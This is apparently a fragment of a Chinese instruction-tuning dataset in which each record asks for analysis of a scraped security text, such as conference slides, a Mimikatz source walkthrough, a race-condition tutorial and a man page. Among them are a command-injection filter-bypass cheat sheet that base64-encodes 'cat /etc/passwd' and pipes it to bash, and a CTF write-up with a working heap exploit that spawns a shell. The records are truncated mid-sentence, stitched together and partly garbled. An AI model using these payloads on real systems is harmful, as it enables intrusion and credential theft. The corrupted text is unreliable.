每次互动要选出前三名进行奖励 应该选择哪一个 坑五 拉群拉群拉群好累好累好累 我花了99元你应该服务我一生 群死了 我们只建精华群 普通星友 优秀星友 荣誉感 归属感 高质量发帖 - 周之星 - 月之星 - 互动TOP3 坑六 差不多就行了差不多就算了 设计感很重要 坑七 下次注意下次一定不注意 错误的事都要变成流程 我是小结 一张图回答我是谁 KP 关键合作伙伴 KA 关键活动 VP 价值主张 CR 客户关系 CS 目标客群 CH渠道 KR 关键资源 C$ 成本结构 R$ 收益结构 谁可以帮我 要做什么 我有什么 怎样和对方打交道 我能帮助到谁 如何宣传自己 我要付出什么 我会得到什么 1. 知识星球 2. KOL 3. 印象笔记 4. iSlide 5. 得到 6. 数据  1. 拉新 2. 促活 1. 社群学习氛围 2. 免费资源 3. 红包奖励 4. 荣誉打造 5. 专属微信群 1. 职场效率提升 2. 找准向少踩坑 1. 评论 2. 问答 3. 核群 4. 发 5. 直播 1. 公众号 2. 微博 3. 知识星球 4. 用户碑分享 作1-5年的职场 1.资 2.星球奖励 3.直播感谢 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Race Condition ## 概述 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序当这些不受控制的事件并没有按照开发者想要的方式运行时就可能会出现 bug这个术语最初来自于两个电信号互相竞争来影响输出结果 条件竞争主要出现在如下领域 - 电子系统尤其是逻辑电路 - 计算机尤其是多线程程序和分布式程序 由于目前的系统中大量采用并发编程经常对资源进行共享往往会产生条件竞争漏洞 这里我们主要考虑计算机程序方面的条件竞争当一个软件的运行结果依赖于进程或者线程的顺序时就可能会出现条件竞争简单考虑一下可以知道条件竞争需要如下的**条件** - 并发即至少存在两个并发执行流这里的执行流包括线程进程任务等级别的执行流 - 共享对象即多个并发流会访问同一对象**常见的共享对象有共享内存文件系统信号一般来说这些共享对象是用来使得多个程序执行流相互交流**此外我们称访问共享对象的代码为**临界区**在正常写代码时这部分应该加锁 - 改变对象即至少有一个控制流会改变竞争对象的状态因为如果程序只是对对象进行读操作那么并不会产生条件竞争 由于在并发时执行流的不确定性很大条件竞争相对**难察觉**并且在**复现和调试方面会比较困难**这给修复条件竞争也带来了不小的困难 条件竞争造成的影响也是多样的轻则程序异常执行重则程序崩溃如果条件竞争漏洞被攻击者利用的话很有可能会使得攻击者获得相应系统的特权 这里举一个简单的例子 ```c #include <pthread.h> #include <stdio.h> int counter; void *IncreaseCounter(void *args) { counter += 1; sleep(0.1); printf(\"Thread %d has counter value %d\\n\", (unsigned int)pthread_self(), counter); } int main() { pthread_t p[10]; for (int i = 0; i < 10; ++i) { pthread_create(&p[i], NULL, IncreaseCounter, NULL); } for (int i = 0; i < 10; ++i) { pthread_join(p[i], NULL); } return 0; } ``` 一般来说我们可能希望按如下方式输出 ```shell  005race_condition ./example1 Thread 1859024640 has counter value 1 Thread 1841583872 has counter value 2 Thread 1832863488 has counter value 3 Thread 1824143104 has counter value 4 Thread 1744828160 has counter value 5 Thread 1736107776 has counter value 6 Thread 1727387392 has counter value 7 Thread 1850304256 has counter value 8 Thread 1709946624 has counter value 9 Thread 1718667008 has counter value 10 ``` 但是由于条件竞争的存在最后输出的结果往往不尽人意 ```c  005race_condition ./example1 Thread 1417475840 has counter value 2 Thread 1408755456 has counter value 2 Thread 1391314688 has counter value 8 Thread 1356433152 has counter value 8 Thread 1365153536 has counter value 8 Thread 1373873920 has counter value 8 Thread 1382594304 has counter value 8 Thread 1400035072 has counter value 8 Thread 1275066112 has counter value 9 Thread 1266345728 has counter value 10 ``` 仔细思考一下条件竞争为什么可能会发生呢以下面的为具体的例子 - 程序首先执行了action1然后执行了action2其中 action 可能是应用级别的也可能是操作系统级别的正常来说我们希望程序在执行 ac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-Mimikatz源码调试 前期准备 mimikatz源码地址 调试环境 vs2019 几点设置 1. 因为官方项目没有debug方案所以需要手动添加debug配置 2. 项目属性配置 程序入口 调试以 privilege::debug 为例打开调试-> mimikatz 调试属性->配置属性->调试->命令参数 wmain()是 mimikatz`的入口函数 命令分发 从上面的循环中获取到请求参数之后就进入到命令分发的 mimikatz_dispatchCommand() 函数 这里首先有一个 kull_m_file_fullPath 方法然后进行匹配暂时不知道具体作用是什么之 后进入 mimikatz_doLocal() 方法 命令执行 在对命令进行请求分发之后获取到 module 和 commond 两个参数之后就进入了命令执行的阶段 这个地方涉及到结构体的知识 首先 mimikatz_modules[] 是一个数组数组里面存放的是每一个模块的结构体的指针那么第 210行就是将 module 的值和每个模块结构体中定义的 shortName 进行比较如果相同返回0 结构体的结构在 kuhl_m.h 这个头文件中进行定义 之后第213和214两行相同的方式去寻找同一个模块下存在的 command 每个模块都预先定义一个 数组存放全部的可执行方法的信息 最重要的就是第215行 status = mimikatz_modules[indexModule]- >commands[indexCommand].pCommand(argc - 1, argv + 1); 执行这个模块和命令 mimikatz_modules[indexModule]->commands[1] 这一步相当于找到了 kuhl_m_c_privilege[] 这个数组的第一个元素然后这个 const KUHL_M_C kuhl_m_c_privilege[] 数组是一个结构体数组这个第一项表示的是一个 指针函数 那后面 的 .pCommand(argc - 1, argv + 1) 就是去调用 kuhl_m_privilege_debug 这个函数 可以看到的是对于 privilege::debug 这个功能执行的函数是 kuhl_m_privilege_simple() 而最后调用的系统API是 RtlAdjustPrivilege()  至此整个简单的流程分析已经结束了关于 mimikatz 的请求流程和命令分发已经了解清楚 了 S-Mimikatz_msv模块 NTSTATUS kuhl_m_privilege_simple(ULONG privId) { ULONG previousState; NTSTATUS status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState); if(NT_SUCCESS(status)) kprintf(L\"Privilege \\'%u\\' OK\\n\", privId); else PRINT_ERROR(L\"RtlAdjustPrivilege (%u) %08x\\n\", privId, status); return status; } 模块介绍 在 mimikatz 中 msv 模块的作用是枚举 LM 和 NTLM 凭证 KUHL_M_C 结构体中的描述是 Lists LM & NTLM credentials 根据之前分析的命令分发过程 sekurlsa::msv 最终通过函数指针调用 函数 kuhl_m_sekurlsa_msv() 函数文件位置 kuhl_m_seckurlsa_msv1_0.c 结构体 KUHL_M_SEKURLSA_PACKAGE 此处可以看到 ModuleName 的值设置为 lsasrv.dll 这个 也是抓取 NTML 的重点模块 KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L\"msv\", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L\"lsasrv.dll\", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}}; const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package}; NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[]) { return kuhl_m_s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDont Whisper My Chips ColinOFlynn.com  DEFCON 2015. 1 Colin OFlynn  Dalhousie University  Halifax, NS. Canada. Objective: Learn about all sorts of physical layer attacks. Critical Difference: Everything Im showing you is open source and freely available. Most of the hardware is commercially available (its difficult for hardware to be free), but you can DIY it too if you wish, or use existing tools (e.g. oscilloscope). www.NewAE.com Open Source Tools Posted to: www.ChipWhisperer.com ColinOFlynn.com  DEFCON 2015. 2 ColinOFlynn.com  DEFCON 2015. 3 ColinOFlynn.com  DEFCON 2015. 4 ColinOFlynn.com  DEFCON 2015. 5 ColinOFlynn.com  DEFCON 2015. 6 Embedded System: ColinOFlynn.com  DEFCON 2015. 8 Not an Embedded System: unsigned char correctpin[6] = {1,2,3,4,5,6}; unsigned char enteredpin[6]; read_pin_from_buttons(enteredpin); for (i = 0; i < 6; i++){ if (correctpin[i] != enteredpin[i]){ return; } } ColinOFlynn.com  DEFCON 2015. 10 ColinOFlynn.com  DEFCON 2015. 11 ColinOFlynn.com  DEFCON 2015. 12  Important: Must discover when microcontroller detects button press, not when user presses button  Need to do some slight reverse-engineering to discover if using multiplexing, how often polling of buttons, etc ColinOFlynn.com  DEFCON 2015. 13 ColinOFlynn.com  DEFCON 2015. 14 ColinOFlynn.com  DEFCON 2015. 15  Dont compare input directly to saved password  Ideally: use hashes, also prevents attacker from reading out memory  Dont give any response when wrong  No timing information easily available  Depends how you define easily though. ColinOFlynn.com  DEFCON 2015. 16  TinySafeBoot (TSB) is Awesome Bootloader for AVRs  See http://jtxp.org/tech/tinysafeboot_en.htm  DOES NOT claim any sort of cryptographic protection  BUT  What if someone uses it expecting it to be secure? ColinOFlynn.com  DEFCON 2015. 17 CheckPW: chpw1: lpm tmp3, z+ ; load character from Flash cpi tmp3, 255 ; byte value (255) indicates breq chpwx ; end of password -> okay rcall Receivebyte ; else receive next character ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Injectable Exploits Kevin Johnson  kevin@inguardians.com Justin Searle  justin@inguardians.com Frank DiMaggio  frank@secureideas.net Copyright 2009 InGuardians, Inc. 2 Copyright 2009 InGuardians, Inc. Who are we?  Kevin Johnson  BASE/SamuraiWTF/Laudanum/Yokoso! Project Lead  Penetration Tester  Author and instructor of SANS SEC542  Justin Searle  SamuraiWTF/Yokoso!/Middler Project Lead  Penetration Tester  SmartGrid and Embedded Hardware Researcher  Frank DiMaggio  Web App Security Researcher  Laudanum Project Lead 3 Copyright 2009 InGuardians, Inc. ' or 42=42 -- 4 Copyright 2009 InGuardians, Inc. Its not the Answer ' or 42=42 -- Its the question! 5 Copyright 2009 InGuardians, Inc. Injection Flaws  Injection flaws == the attacker is able to inject content into the application  We love applications that trust users  Categories include  SQL injection  XSS  CSRF  Command Injection  etc 6 Copyright 2009 InGuardians, Inc. Injectable Exploits  Injectable exploits == FUN!  Many different things can happen  SQL injection is one of the most popular  Many different attacks  Retrieving records  Changing transaction  Execute Commands  Write files! 7 Laudanum http://laudanum.inguardians.com 8 Copyright 2009 InGuardians, Inc. Laudanum  Laudanum: also known as opium tincture or tincture of opium, is an alcoholic herbal preparation of opium. It is made by combining ethanol with opium latex or powder. Laudanum contains almost all of the opium alkaloids, including morphine and codeine. A highly potent narcotic by virtue of its morphine content. wikipedia  An awesome open source project that makes exploitation easier. 9 Copyright 2009 InGuardians, Inc. Pieces of Laudanum  Exploit scripts designed for injection  Multiple functions  Written in popular web scripting languages  PHP, ASP, CFM, JSP 10 Copyright 2009 InGuardians, Inc. Examples of Included Functions  DNS Query  Active Directory Query  Nmap Scans  LDAP Retrieval  Shell (Yeah!) 11 Copyright 2009 InGuardians, Inc. SQL Injectio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSafety of the Tor network A look at network diversity, relay operators, and malicious relays Runa A. Sandvik  Developer for the Tor Project  Worked with/for Tor since GSoC 2009  Frequent traveler What this talk is about  Is the Tor network a CIA honeypot?  Are all relays malicious?  Looked at all consensus files created between late 2007 and mid 2013 r OnionSoup CNImeTd8nvcBGTwfGZ2bCz8a7jw 6i1X8TC+YxGlTibB352JRwVHEu8 2012-09-17 22:00:03 87.195.253.3 9001 9030 s Exit Fast Guard HSDir Named Running V2Dir Valid v Tor 0.2.3.20-rc w Bandwidth=5800 p accept 80,110,143,443,993,995 r OnionSoup CNImeTd8nvcBGTwfGZ2bCz8a7jw 6i1X8TC+YxGlTibB352JRwVHEu8 2012-09-17 22:00:03 87.195.253.3 9001 9030 s Exit Fast Guard HSDir Named Running V2Dir Valid v Tor 0.2.3.20-rc w Bandwidth=5800 p accept 80,110,143,443,993,995 r OnionSoup CNImeTd8nvcBGTwfGZ2bCz8a7jw 6i1X8TC+YxGlTibB352JRwVHEu8 2012-09-17 22:00:03 87.195.253.3 9001 9030 s Exit Fast Guard HSDir Named Running V2Dir Valid v Tor 0.2.3.20-rc w Bandwidth=5800 p accept 80,110,143,443,993,995 r OnionSoup CNImeTd8nvcBGTwfGZ2bCz8a7jw 6i1X8TC+YxGlTibB352JRwVHEu8 2012-09-17 22:00:03 87.195.253.3 9001 9030 s Exit Fast Guard HSDir Named Running V2Dir Valid v Tor 0.2.3.20-rc w Bandwidth=5800 p accept 80,110,143,443,993,995 Number of relays in all countries The Tor Project  https://metrics.torproject.org/ 0 1000 2000 3000 2008 2009 2010 2011 2012 2013 High-level statistics  95,314 unique nicknames  1,595,879 unique IP address  230,595 unique fingerprints  195 different countries Top countries  The US  Germany  France  Russia  Netherlands  United Kingdom Top nicknames  Popular nicknames: Unnamed, default, ididnteditheconfig, idideditheconfig, MgeniUser, anonymous  anonymous (Germany, Sweden, US, Ukraine) versus Anonymous (US, Germany, Ukraine, Japan)  A lot of Orbot relays in the Middle East What is average?  Uptime  Lifetime  Bandwidth  Utilization So its all good?  China  Russia  Eastern European botnet Network diversity  Different relays owned by ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n// `id` $(id) \\nid idwhoami id&&whoami id||whoami // {ls,-l} ls\\t-l $(printf \"\\154\\163\") l''s'' l\"\"s l``s l\\s ls$u cat /???/pass* cat /etc$u/passwd cat /etc/pass{wd,} a=c;b=a;c=t; $a$b$c 1.txt //base64 echo 'cat' | base64 `echo 'Y2F0wqAK' | base64 -d` 1.txt //base64cat /etc/passwd echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash //16cat /etc/passwd echo \"636174202F6574632F706173737764\" | xxd -r -p|bash // cd - // cd ~test ///home/test memo 0x00 0x01 0x02 0x03 0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Vary --- ## Vary 的作用 Vary 一般出现在 HTTP 请求的响应信息头部比如像下面这样 ``` HTTP/1.0 200 OK Date: Fri, 24 Sep 2010 23:09:32 GMT Content-Type: application/json;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding,User-Agent Age: 1235 X-Cache: HIT from cache.kolich.local X-Cache-Lookup: HIT from cache.kolich.local:80 Content-Length: 25090 Connection: close ``` 或者是这样 ``` HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2013 16:34:48 GMT Content-Type: application/x-javascript Content-Length: 66748 Last-Modified: Tue, 31 Dec 2013 14:30:52 GMT Connection: keep-alive Vary: Accept-Encoding ETag: \"52c2d51c-104bc\" Expires: Fri, 29 Dec 2023 16:34:48 GMT Cache-Control: max-age=315360000 Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes ``` **Vary 出现在响应信息中的作用是什么呢** 首先这是由服务器端添加添加到响应头部大部分情况下是用在客户端缓存机制或者是缓存服务器在做缓存操作的时候会使用到 Vary 头会读取响应头中的 Vary 的内容进行一些缓存的判断 对于服务器提供的某个接口来说有时候会出现不同种类的客户端对其进行网络请求获取数据不同的客户端可能支持的压缩编码方式不同可能有的客户端不支持压缩那么服务器端返回的数据就不能压缩有的支持 gzip 编码那么服务器端就可以进行 gzip 编码返回给客户端客户端获取到数据之后做响应的 gzip 解码还有种情况对于不同的客户端需要的内容不一样比如针对特定浏览器要求输出的内容不一样比如在 IE6 浏览器上要输出不一样的内容这就需要服务器端做不同的数据返回所以说服务器提供的同一个接口客户端进行同样的网络请求对于不同种类的客户端可能需要的数据不同服务器端的返回方式返回数据也会不同对于这个问题的解决我们可以在请求信息添加 Accept-EncodingUser-Agent 等头部 这些都没有问题顺利的解决了我们上面提出的问题然而当使用到缓存的时候就会有问题比如要求针对 IE5 和 IE6 显示不同的数据针对同一接口的同样的请求缓存服务器中分别存储了 IE5 和 IE6 两份数据由于同样的接口同样的请求一旦服务器判定要从缓存中获取数据的话很有可能会导致两个客户端的请求拿到同一份数据这就会让那个数据展示出现问题再比如说A类客户端支持压缩格式 gzipB 类客户端不支持压缩对于同一个接口同样的请求如果服务器端打算从缓存服务器中取出数据返回的话AB 两类客户端可能会收到同样的数据这样要就会导致编解码出错 这时候我们的 Vary 响应头就登场了Vary 的字面意思是不一多样化顾名思义它的存在区分同样的网络请求的不同之处其实就是通过头部信息来区分 *一个简单的 Vary 头包括* ``` Vary: Accept-Encoding Vary: Accept-Encoding,User-Agent Vary: X-Some-Custom-Header,Host Vary: * ``` Vary 存在于响应头中它的内容来自于请求头中相关字段Vary 头的内容如果是多条则用 `,` 分割缓存服务器会将某接口的首次请求结果缓存下来包括响应头中的 Vary后面在发生相同请求的时候缓存服务器会拿着缓存的 Vary 来进行判断比如 Vary: Accept-Encoding,User-Agent那么 Accept-Encoding 与 User-Agent 两个请求头的内容就会作为判断是否返回缓存数据的依据当缓存服务器中相同请求的缓存数据的编码格式代理服务与当前请求的编码格式代理服务一致那就返回缓存数据否则就会从服务器重新获取新的数据当缓存服务器中已经缓存了该条请求那么某次服务器端的响应头中如果 Vary 的值改变则 Vary 会更新到该请求的缓存中去下次请求会对比新的 Vary 内容 *", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid Universal Root Exploiting xPU Drivers Xingyu Jin Richard Neal Jon Bottarini #BHUSA @BlackHatEvents #BHUSA @BlackHatEvents Who are we? Jon Bottarini @jon_bottarini Xingyu Jin @1ce0ear Richard Neal @ExploitDr0id #BHUSA @BlackHatEvents What are we talking about?  Rooting exploits on Android  In-the-wild  Internal research  Android Partner Vulnerability Initiative #BHUSA @BlackHatEvents Some old driver vulns #BHUSA @BlackHatEvents mtk-su Exploit #BHUSA @BlackHatEvents XDA Developers #BHUSA @BlackHatEvents XDA Developers #BHUSA @BlackHatEvents 6f35a3ff: /dev/ion 4b4ab49b: /dev/mtk_cmdq 6d7a00fc: /proc/mtk_cmdq Reverse engineering the exploit #BHUSA @BlackHatEvents  CMDQ_IOCTL_EXEC_COMMAND  Send a buffer of opcodes from user -> kernel  Opcodes - CMDQ_CODE_ENUM CVE-2020-0069 #BHUSA @BlackHatEvents  Restrict access via SELinux policy:  Can't open device node:  SELinux Fix #BHUSA @BlackHatEvents Lessons Learned #BHUSA @BlackHatEvents GPU Driver: Perfect Local Attack Surface  Its impossible to restrict unprivileged users from accessing GPU driver  GPU device driver exports a lot of functionality to userspace  Mobile GPU  ARM: Mali  Qualcomm: Adreno  Imagination Technologies: PowerVR Google received a lot of security reports Only 1 in 2019 #BHUSA @BlackHatEvents PowerVR GPU is everywhere  PowerVR may have the biggest market share in numbers (MediaTek / UniSoc) Use PowerVR GPU #BHUSA @BlackHatEvents Intro to Bridge APIs  No surprise, unprivileged user can talk to PowerVR GPU driver  PowerVR GPU driver exports hundreds of kernel functions to userspace  Exported functions are called Bridge functions by PowerVR developers  Three steps  Open device  Send ioctl code and arguments  Get response #BHUSA @BlackHatEvents Intro to Bridge APIs  Bridge APIs #BHUSA @BlackHatEvents Intro to Bridge APIs  Overview of how Bridge APIs work  Every step is buggy #BHUSA @BlackHatEvents Heap overflow in Bridge APIs  Call Bridge API PVRSRVBridgeSyncPrimOpTake  Group ID 2, Function ID 9  Input ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPorosity Decompiling Ethereum Smart-Contracts Matt Suiche (@msuiche) Founder, Comae Technologies m@comae.io Whoami @msuiche Comae Technologies OPCDE - www.opcde.com First time in Vegas since BlackHat 2011 Mainly Windows-related stuff CloudVolumes (VMware App Volumes) Memory Forensics for DFIR (Hibr2Bin, DumpIt etc.) looks like such fun guy  TheShadowBrokers Didnt know much about blockchain before this project Just so you know We wont talk about POW/POS stuff We wont talk about Merkle Trees We wont talk about how to becoming a crypto-currency millionaire We will talk about the Ethereum EVM We will talk about Solidity We will talk about smart-contract bytecodes And yes, the tool isnt perfect  Agenda Ethereum Virtual Machine (EVM) Memory Management Addresses Call Types Type Discovery Smart-Contract Code Analysis Known Bugs Future Solidity Solidity the quality or state of being firm or strong in structure. But also the name of Ethereums smart-contracts compiler Porosity is the quality of being porous, or full of tiny holes. Liquids go right through things that have porosity. But also the name of Comaes smart-contract decompiler. Accounts Normal Accounts: 3,488,419 (July 15) Contract Accounts: 930,889 (July 15) Verified Contract Accounts: 2285 (July 15) Source code is provided. 40M$ lost in July 10M$ in CoinDashs ICO http://www.coindesk.com/coindash-ico-hacker-nets-additional- ether-theft-tops-10-million/ 30M$ due to Paritys wallet.sol vulnerability https://blog.parity.io/security-alert-high-2/ https://github.com/paritytech/parity/pull/6103 Ethereum Virtual Machine (EVM) Account/Contract/Blockchain A Smart-Contract is made of bytecode stored in the blockchain. An address is a 160-bits value & corresponds to an account Operates 256-bits pseudo-registers EVM does not really have registers, but uses a virtual stack to replace them. Solidity & Smart Contracts Solidity compiles JavaScript-like code into Ethereum bytecode. contract Coin { // The keyword \"public\" makes those va", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 调整输出的信息等级 --- ## 调整输出的信息等级 为了方便调试与排错CF 提供了以下 7 个输出等级 | 序号 | 等级 | 名称 | 描述 | | :--: | :---: | :------------: | :--------------------------------: | | 1 | trace | 追踪 | 最详细的输出等级 | | 2 | debug | 调试 | 次详细的输出等级 | | 3 | info | 信息 | 程序默认的输出等级 | | 4 | warn | 警告 | 程序出现警告时的输出等级 | | 5 | error | 错误 | 程序出现错误时的输出等级 | | 6 | fatal | 致命错误 | 程序出现致命错误时输出的等级 | | 7 | panic | 不可预见的错误 | 程序出现不可预见的错误时输出的等级 | 在 CF 的任何命令中都可以使用 `--logLevel` 参数去指定输出信息的等级 在这几个等级中debug 是比较常用的等级例如以 debug 输出等级列出阿里云的 ECS 实例 ```bash cf alibaba ecs ls --logLevel debug ``` <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年9月7日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 1 SQL Injection Are Your Web Applications Vulnerable? A White Paper from SPI Dynamics  2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 2 TABLE OF CONTENTS 1. OVERVIEW AND INTRODUCTION TO WEB APPLICATIONS AND SQL INJECTION3 1.1. Overview ....................................................................................................................................................3 1.2. Background................................................................................................................................................3 1.3. Character encoding...................................................................................................................................3 2. TESTING FOR VULNERABILITY............................................................................................. 4 2.1. Comprehensive testing..............................................................................................................................4 2.2. Testing procedure......................................................................................................................................4 2.3. Evaluating results......................................................................................................................................5 3. ATTACKS....................................................................................................................................... 6 3.1. Authorization bypass ................................................................................................................................6 3.2. SELECT.....................................................................................................................................................7 3.2.1. Direct vs. Quoted.....................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF-WP-Nu1L CTF-WP-Nu1L WEB Game who_are_you? show_me_your_image PWN PWN1 PWN2 MISC 24word Reverse Flat srcleak py Crypto sm4 dp WEB Game who_are_you? xxe show_me_your_image 34 aaa.png/aaaaaa.png/aaaaaaaaa.png hint/root/flag.txt # coding: UTF-8 import base64 import requests import urllib import re PWN PWN1 url=\"http://8037491c16b9419cbfde37b3412f2850ab40994a932a4b57.changame.ichun qiu.com/\" def endfile(payload): filename=payload+'.png' url_base=url+'upload.php' named=requests.post(url=url_base,files={'file':(filename,'text')}) return urllib.unquote(named.text.split('img.php?name=')[1])[:4] payload = \"../../../../../../.././root/flag.txt\" if len(payload) % 3 != 0: exit('sorry') filed=re.findall(r'.{3}', payload) endf=\"\" for i in range(0,len(filed)): print filed[i] endf += endfile(filed[i]) print requests.get(url+\"img.php?\"+urllib.urlencode({'name':endf})).text from pwn import * #io = process(['python','./test.py']) io = remote('df0a72047d6c.gamectf.com', 10001) #io = process('./pwn') import base64 context(arch='i386') global p def add(size,cont): global p p+='1\\n' p+=str(size)+'\\n' p+=cont def dele(idx): global p p+='2'+'\\n' p+=str(idx)+'\\n' def edit(idx,cont): global p p+='3'+'\\n' p+=str(idx)+'\\n' p+=cont PWN2 io.recvuntil('token') io.sendline('icq61ef0bb5a3803759c3c5a890adcea') raw_input() p='' add(0x200,'x'*0x200) add(0x200,'x'*0x200) add(0x200,'x'*0x200) add(0x200,'x'*0x200) add(0x104,'a'*0x104) add(0x104,'b'*0x104) add(0x104,'c'*0x104) edit(4,0x104*'a') edit(4,'aaaa'+p32(0x101)+p32(0x80eba50-12)+p32(0x80eba50- 8)+'a'*0xf0+p32(0x100)+'\\x08\\x01') dele(5) edit(4,p32(0x80eba40)+'\\n') edit(1,p32(0x80ea4d8)+p32(0x80eba44)+p32(0x80ebad0)+'\\n') edit(2,asm(shellcraft.sh())+'\\n') edit(0,p32(0x80ebad0)+'\\n') #raw_input(\"4\") p+='1\\n' #raw_input(\"5\") p+='100\\n' p+='cat /flag\\n' #raw_input(\"6 ok\") #p.sendline('icq61ef0bb5a3803759c3c5a890adcea') pay = base64.b64encode(p) print pay io.sendline(pay) io.interactive() from pwn import * def add(size,cont): p.recvuntil('>>>') p.sendl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking electric skateboards: vehicle research for mortals Richo Healey & Mike Ryan @mpeg4codec / Hacking Electric Skateboards / @rich0H Who are these jerks anyway  richo  Computer Jerk  @rich0H  Duck Enthusiast  Ran WrongIslandCon  mike  Bluetooth Guy  @mpeg4codec  Owner/Operator of conscience (sometimes) @mpeg4codec / Hacking Electric Skateboards / @rich0H Why buy an $nK skateboard?  Lightweight  (relatively) inexpensive  .. maybe wanted on the hype train early @mpeg4codec / Hacking Electric Skateboards / @rich0H Why buy an $nK skateboard?  Lightweight  (relatively) inexpensive  .. maybe wanted on the hype train early  Maybe to hax it @mpeg4codec / Hacking Electric Skateboards / @rich0H Why hax a $1k skateboard?  Because its there  Vehicle research is cool  But not all of us can afford to brick a car  Figured we might be able to illustrate a point about the state of security research @mpeg4codec / Hacking Electric Skateboards / @rich0H The boards  Boosted @mpeg4codec / Hacking Electric Skateboards / @rich0H The boards  Evolve @mpeg4codec / Hacking Electric Skateboards / @rich0H The boards  Yuneec E-go @mpeg4codec / Hacking Electric Skateboards / @rich0H Maybe youve spotted the design trend here @mpeg4codec / Hacking Electric Skateboards / @rich0H Hope yer wearin yer lernin b00tz Agenda  Boosted  Bluetooth GATT  Jammers  PyBT  Evolve   bluetooth?  Weird RF protocols  E-go   wifi?!  Boosted (Redux)  Fiiiiiirmware! @mpeg4codec / Hacking Electric Skateboards / @rich0H Or whatever Right so like hacking  Most of these boards use bluetooth  I know nothing about bluetooth  I know mike though  mike knows bluetooth  How hard can this possibly be? @mpeg4codec / Hacking Electric Skateboards / @rich0H Boosted @mpeg4codec / Hacking Electric Skateboards / @rich0H Boosted  Bluetooth Remote  Regenerative Braking  Firmware Upgradable @mpeg4codec / Hacking Electric Skateboards / @rich0H Storytime Co-opting a GATTling gun Bluetooth and You  Bought some uberteeth  Looked at some packet", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" This file Copyright 1992,93 Michael K. Johnson (johnsonm@stolaf.edu) .\\\" Copyright 1995,1996 Miquel van Smoorenburg <miquels@cistron.nl> .\\\" Copyright 1997-2000 Jukka Lahtinen <walker@clinet.fi> .\\\" It may be distributed under the GNU Public License, version 2, or .\\\" any higher version. See section COPYING of the GNU Public license .\\\" for conditions under which this file may be redistributed. .TH MINICOM 1 \"2003/11/24 05:09:58\" \"User's Manual\" .SH NAME minicom \\- 友好易用的串口通信程序 .SH \"总览 SYNOPSIS\" .B minicom .RI \"[-somMlwz8] [-c on|off] [-S script] [-d entry]\" .br .in 15 .RI \"[-a on|off] [-t term] [-p pty] [-C capturefile] [\" configuration ] .SH \"描述\" .B minicom 是个通信程序有点象共享软件 TELIX但其源码可以自由获得并能够运行于多 数Unix系统 它包括以下特性自动重拨号的拨号目录 对串行设备UUCP格式的 lock文件的支持独立的脚本语言解释器文件捕获多用户单独配置等等 .SH \"命令行参数 COMMAND-LINE\" .TP 0.5i .B -s .BR 设置 root 使用此选项在/etc/minirc.dfl中编辑系统范围的缺省值 使用此参数后minicom 将 .I 不 进行初始化 而是直接进入配置菜单如果因为你的系统被改变或者第一次运行 minicom时minicom不能启动这个参数就会很有用对于多数系统已经内定了 比较合适的缺省值 .TP 0.5i .B -o 不进行初始化minicom 将跳过初始化代码如果你未复位(reset)就退出了 minicom又想重启一次会话(session) 那么用这个选项就比较爽(不会再有错误 提示modem is locked ---- 注)但是也有潜在的危险由于未对lock文件等进 行检查因此一般用户可能会与uucp之类的东东发生冲突......也许以后这个参数 会被去掉现在姑且假定使用modem的用户对自己的行为足够负责 .TP 0.5i .B -m 用Meta或Alt键重载命令键在1.80版中这是缺省值也可以在minicom 菜单中配置 这个选项不过若你一直使用不同的终端其中有些没有Meta或Alt键那么方便的 做法还是把缺省的命令键设置为Ctrl-A当你有了支持Meta或Alt键的键盘时再使用 此选项Minicom假定你的Meta键发送ESC前缀而不是设置字符最高位的那一种(见 下) .TP 0.5i .B -M 跟\\(lq-m\\(rq一样但是假定你的Meta键设置字符高端的第八位(发送128+字符代码) .TP 0.5i .B -z 使用终端状态行仅当终端支持并且在其termcap或terminfo数据库入口中有相关 信息时才可用 .TP 0.5i .B -l .BR 逐字翻译 高位被置位的字符使用此标志 minicom将不再尝试将IBM行字符翻译为ASCII码 而是将其直接传送许多PC-Unix克隆不经翻译也能正确显示它们(Linux使用专门的 